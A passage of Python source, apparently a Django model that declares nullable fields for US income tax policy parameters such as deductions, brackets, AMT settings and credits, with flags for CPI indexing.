ALD_StudentLoan_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_SelfEmploymentTax_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_SelfEmp_HealthIns_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_KEOGH_SEP_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_EarlyWithdraw_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Alimony_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Dependents_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Dependents_Child_c = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Dependents_Child_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ALD_Dependents_Elder_c = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Dependents_Elder_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ALD_Dependents_thd_0 = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Dependents_thd_1 = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Dependents_thd_2 = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Dependents_thd_3 = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Dependents_thd_4 = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Dependents_thd_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ALD_Investment_ec_rt = CommaSeparatedField(default=None, blank=True, null=True)
ALD_InvInc_ec_base_code_active = CommaSeparatedField(default=None, blank=True, null=True)
ALD_InvInc_ec_rt = CommaSeparatedField(default=None, blank=True, null=True)
ALD_EducatorExpenses_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_HSADeduction_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_IRAContributions_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_DomesticProduction_hc = CommaSeparatedField(default=None, blank=True, null=True)
ALD_Tuition_hc = CommaSeparatedField(default=None, blank=True, null=True)
DependentCredit_Child_c = CommaSeparatedField(default=None, blank=True, null=True)
DependentCredit_Nonchild_c = CommaSeparatedField(default=None, blank=True, null=True)
FilerCredit_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
FilerCredit_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
FilerCredit_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
FilerCredit_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
FilerCredit_c_4 = CommaSeparatedField(default=None, blank=True, null=True)
FilerCredit_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
FEI_ec_c = CommaSeparatedField(default=None, blank=True, null=True)
FEI_ec_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Parameters used for Personal Exemptions.
II_em = CommaSeparatedField(default=None, blank=True, null=True)
II_em_cpi = models.NullBooleanField(default=None, blank=True, null=True)
II_prt = CommaSeparatedField(default=None, blank=True, null=True)
II_em_ps_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_em_ps_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_em_ps_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_em_ps_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_em_ps_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Parameters used for Standard Deductions.
STD_Dep = CommaSeparatedField(default=None, blank=True, null=True)
STD_0 = CommaSeparatedField(default=None, blank=True, null=True)
STD_1 = CommaSeparatedField(default=None, blank=True, null=True)
STD_2 = CommaSeparatedField(default=None, blank=True, null=True)
STD_3 = CommaSeparatedField(default=None, blank=True, null=True)
STD_4 = CommaSeparatedField(default=None, blank=True, null=True)
STD_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Parameters used for Personal Refundable Credit.
II_credit_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_4 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_cpi = models.NullBooleanField(default=None, blank=True, null=True)
II_credit_ps_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_ps_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_ps_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_ps_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_ps_cpi = models.NullBooleanField(default=None, blank=True, null=True)
II_credit_prt = CommaSeparatedField(default=None, blank=True, null=True)
#Confirm for additional aged
STD_Aged_0 = CommaSeparatedField(default=None, blank=True, null=True)
STD_Aged_1 = CommaSeparatedField(default=None, blank=True, null=True)
STD_Aged_2 = CommaSeparatedField(default=None, blank=True, null=True)
STD_Aged_3 = CommaSeparatedField(default=None, blank=True, null=True)
STD_Aged_4 = CommaSeparatedField(default=None, blank=True, null=True)
STD_Aged_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Parameters used for Itemized Deductions.
ID_Medical_frt = CommaSeparatedField(default=None, blank=True, null=True)
ID_Medical_frt_add4aged = CommaSeparatedField(default=None, blank=True, null=True)
ID_Medical_hc = CommaSeparatedField(default=None, blank=True, null=True)
ID_Medical_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Medical_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Medical_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Medical_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Medical_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_InterestPaid_hc = CommaSeparatedField(default=None, blank=True, null=True)
ID_InterestPaid_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_InterestPaid_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_InterestPaid_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_InterestPaid_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_InterestPaid_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_Casualty_frt = CommaSeparatedField(default=None, blank=True, null=True)
ID_Casualty_hc = CommaSeparatedField(default=None, blank=True, null=True)
ID_Casualty_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Casualty_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Casualty_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Casualty_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Casualty_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_Miscellaneous_frt = CommaSeparatedField(default=None, blank=True, null=True)
ID_Miscellaneous_hc = CommaSeparatedField(default=None, blank=True, null=True)
ID_Miscellaneous_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Miscellaneous_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Miscellaneous_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Miscellaneous_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Miscellaneous_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_Charity_crt_all = CommaSeparatedField(default=None, blank=True, null=True)
ID_Charity_crt_noncash = CommaSeparatedField(default=None, blank=True, null=True)
ID_Charity_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Charity_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Charity_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Charity_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_Charity_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_ps_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_ps_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_ps_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_ps_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_ps_4 = CommaSeparatedField(default=None, blank=True, null=True)
ID_ps_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_prt = CommaSeparatedField(default=None, blank=True, null=True)
ID_crt = CommaSeparatedField(default=None, blank=True, null=True)
ID_StateLocalTax_hc = CommaSeparatedField(default=None, blank=True, null=True)
ID_StateLocalTax_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_StateLocalTax_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_StateLocalTax_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_StateLocalTax_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_StateLocalTax_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_StateLocalTax_crt = CommaSeparatedField(default=None, blank=True, null=True)
ID_StateLocalTax_crt_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_RealEstate_hc = CommaSeparatedField(default=None, blank=True, null=True)
ID_RealEstate_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_RealEstate_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_RealEstate_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_RealEstate_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_RealEstate_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_RealEstate_crt = CommaSeparatedField(default=None, blank=True, null=True)
ID_RealEstate_crt_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_Charity_frt = CommaSeparatedField(default=None, blank=True, null=True)
ID_Charity_hc = CommaSeparatedField(default=None, blank=True, null=True)
ID_BenefitSurtax_trt = CommaSeparatedField(default=None, blank=True, null=True)
ID_BenefitSurtax_crt = CommaSeparatedField(default=None, blank=True, null=True)
ID_BenefitSurtax_em_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_BenefitSurtax_em_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_BenefitSurtax_em_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_BenefitSurtax_em_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_BenefitSurtax_em_4 = CommaSeparatedField(default=None, blank=True, null=True)
ID_BenefitSurtax_Switch_0 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitSurtax_Switch_1 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitSurtax_Switch_2 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitSurtax_Switch_3 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitSurtax_Switch_4 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitSurtax_Switch_5 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitSurtax_Switch_6 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitCap_rt = CommaSeparatedField(default=None, blank=True, null=True)
ID_BenefitCap_Switch_0 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitCap_Switch_1 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitCap_Switch_2 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitCap_Switch_3 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitCap_Switch_4 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitCap_Switch_5 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_BenefitCap_Switch_6 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_c_4 = CommaSeparatedField(default=None, blank=True, null=True)
ID_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_AmountCap_rt = CommaSeparatedField(default=None, blank=True, null=True)
ID_AmountCap_rt_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ID_AmountCap_Switch_0 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_AmountCap_Switch_1 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_AmountCap_Switch_2 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_AmountCap_Switch_3 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_AmountCap_Switch_4 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_AmountCap_Switch_5 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_AmountCap_Switch_6 = models.CharField(default="True", blank=True, null=True, max_length=50)
ID_AllTaxes_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
ID_AllTaxes_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
ID_AllTaxes_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
ID_AllTaxes_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
ID_AllTaxes_c_4 = CommaSeparatedField(default=None, blank=True, null=True)
ID_AllTaxes_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Parameters used for Investment Tax Rates.
CG_rt1 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk1_0 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk1_1 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk1_2 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk1_3 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk1_4 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk1_cpi = models.NullBooleanField(default=None, blank=True, null=True)
CG_rt2 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk2_0 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk2_1 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk2_2 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk2_3 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk2_4 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk2_cpi = models.NullBooleanField(default=None, blank=True, null=True)
CG_rt3 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk3_0 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk3_1 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk3_2 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk3_3 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk3_4 = CommaSeparatedField(default=None, blank=True, null=True)
CG_brk3_cpi = models.NullBooleanField(default=None, blank=True, null=True)
CG_rt4 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_rt1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_4 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_CG_rt2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_4 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_CG_rt3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_4 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_CG_rt4 = CommaSeparatedField(default=None, blank=True, null=True)
CG_nodiff = CommaSeparatedField(default=None, blank=True, null=True)
CG_ec = CommaSeparatedField(default=None, blank=True, null=True)
CG_reinvest_ec_rt = CommaSeparatedField(default=None, blank=True, null=True)
NIIT_rt = CommaSeparatedField(default=None, blank=True, null=True)
NIIT_thd_0 = CommaSeparatedField(default=None, blank=True, null=True)
NIIT_thd_1 = CommaSeparatedField(default=None, blank=True, null=True)
NIIT_thd_2 = CommaSeparatedField(default=None, blank=True, null=True)
NIIT_thd_3 = CommaSeparatedField(default=None, blank=True, null=True)
NIIT_thd_4 = CommaSeparatedField(default=None, blank=True, null=True)
NIIT_thd_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Parameters used for Personal Income Tax Rate
II_rt1 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk1_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk1_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk1_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk1_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk1_4 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk1_cpi = models.NullBooleanField(default=None, blank=True, null=True)
II_rt2 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk2_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk2_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk2_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk2_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk2_4 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk2_cpi = models.NullBooleanField(default=None, blank=True, null=True)
II_rt3 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk3_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk3_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk3_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk3_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk3_4 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk3_cpi = models.NullBooleanField(default=None, blank=True, null=True)
II_rt4 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk4_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk4_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk4_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk4_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk4_4 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk4_cpi = models.NullBooleanField(default=None, blank=True, null=True)
II_rt5 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk5_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk5_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk5_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk5_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk5_4 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk5_cpi = models.NullBooleanField(default=None, blank=True, null=True)
II_rt6 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk6_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk6_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk6_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk6_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk6_4 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk6_cpi = models.NullBooleanField(default=None, blank=True, null=True)
II_rt7 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk7_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk7_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk7_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk7_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk7_4 = CommaSeparatedField(default=None, blank=True, null=True)
II_brk7_cpi = models.NullBooleanField(default=None, blank=True, null=True)
II_rt8 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_prt = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_ps_0 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_ps_1 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_ps_2 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_ps_3 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_ps_4 = CommaSeparatedField(default=None, blank=True, null=True)
II_credit_nr_ps_cpi = models.NullBooleanField(default=None, blank=True, null=True)
# Parameters used for the AMT.
AMT_em_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_4 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_prt = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_ps_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_ps_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_ps_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_ps_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_ps_4 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_ps_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_Child_em_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_Child_em_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_Child_em_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_Child_em_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_Child_em_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_KT_c_Age = CommaSeparatedField(default=None, blank=True, null=True)
AMT_rt1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_rt2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_brk1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_brk1_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_brk1_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_brk1_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_brk1_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_brk1_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_thd_MarriedS_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_thd_MarriedS_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_thd_MarriedS_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_em_pe_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_pe_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_em_pe_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_CG_rt1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk1_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_CG_rt2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk2_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_CG_rt3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_0 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_1 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_2 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_3 = CommaSeparatedField(default=None, blank=True, null=True)
AMT_CG_brk3_cpi = models.NullBooleanField(default=None, blank=True, null=True)
AMT_CG_rt4 = CommaSeparatedField(default=None, blank=True, null=True)
# Parameters used for Credits.
EITC_rt_0 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_rt_1 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_rt_2 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_rt_3 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_prt_0 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_prt_1 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_prt_2 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_prt_3 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_ps_0 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_ps_1 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_ps_2 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_ps_3 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_ps_cpi = models.NullBooleanField(default=None, blank=True, null=True)
EITC_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
EITC_MinEligAge = CommaSeparatedField(default=None, blank=True, null=True)
EITC_MinEligAge_cpi = models.NullBooleanField(default=None, blank=True, null=True)
EITC_MaxEligAge = CommaSeparatedField(default=None, blank=True, null=True)
EITC_MaxEligAge_cpi = models.NullBooleanField(default=None, blank=True, null=True)
EITC_ps_MarriedJ_0 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_ps_MarriedJ_1 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_ps_MarriedJ_2 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_ps_MarriedJ_3 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_ps_MarriedJ_cpi = models.NullBooleanField(default=None, blank=True, null=True)
EITC_InvestIncome_c = CommaSeparatedField(default=None, blank=True, null=True)
EITC_InvestIncome_c_0 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_InvestIncome_c_1 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_InvestIncome_c_2 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_InvestIncome_c_3 = CommaSeparatedField(default=None, blank=True, null=True)
EITC_InvestIncome_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
EITC_indiv = CommaSeparatedField(default=None, blank=True, null=True)
CTC_c = CommaSeparatedField(default=None, blank=True, null=True)
CTC_c_cpi = models.NullBooleanField(default=None, blank=True, null=True)
CTC_prt = CommaSeparatedField(default=None, blank=True, null=True)
CTC_ps_0 = CommaSeparatedField(default=None, blank=True, null=True)
CTC_ps_1 = CommaSeparatedField(default=None, blank=True, null=True)
CTC_ps_2 = CommaSeparatedField(default=None, blank=True, null=True)
CTC_ps_3 = CommaSeparatedField(default=None, blank=True, null=True)
CTC_ps_4 = CommaSeparatedField(default=None, blank=True, null=True)
CTC_ps_cpi = models.NullBooleanField(default=None, blank=True, null=True)
CTC_additional = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_refund_limit_rt = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_refund_limit_payroll_rt = CommaSeparatedField(default=None, blank=True, null=True)
CTC_c_under5_bonus = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_rt = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_ps_0 = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_ps_1 = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_ps_2 = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_ps_3 = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_ps_4 = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_ps_cpi = models.NullBooleanField(default=None, blank=True, null=True)
CTC_new_prt = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_c = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_c_under5_bonus = CommaSeparatedField(default=None, blank=True, null=True)
CTC_new_for_all = models.CharField(default="False", blank=True, null=True, max_length=50)
DependentCredit_before_CTC = CommaSeparatedField(default=None, blank=True, null=True)
ACTC_rt = CommaSeparatedField(default=None, blank=True, null=True)
ACTC_ChildNum = CommaSeparatedField(default=None, blank=True, null=True)
ACTC_rt_bonus_under5family = CommaSeparatedField(default=None, blank=True, null=True)
ACTC_Income_thd = CommaSeparatedField(default=None, blank=True, null=True)
ACTC_Income_thd_cpi = models.NullBooleanField(default=None, blank=True, null=True)
DependentCredit_c = CommaSeparatedField(default=None, blank=True, null=True)
LLC_Expense_c = CommaSeparatedField(default=None, blank=True, null=True)
ETC_pe_Single_0 = CommaSeparatedField(default=None, blank=True, null=True)
ETC_pe_Single_1 = CommaSeparatedField(default=None, blank=True, null=True)
ETC_pe_Single_2 = CommaSeparatedField(default=None, blank=True, null=True)
ETC_pe_Single_cpi = models.NullBooleanField(default=None, blank=True, null=True)
ETC_pe_Married_0 = CommaSeparatedField(default=None, blank=True, null=True)
ETC_pe_Married_1 = CommaSeparatedField(default=None, blank=True, null=True)
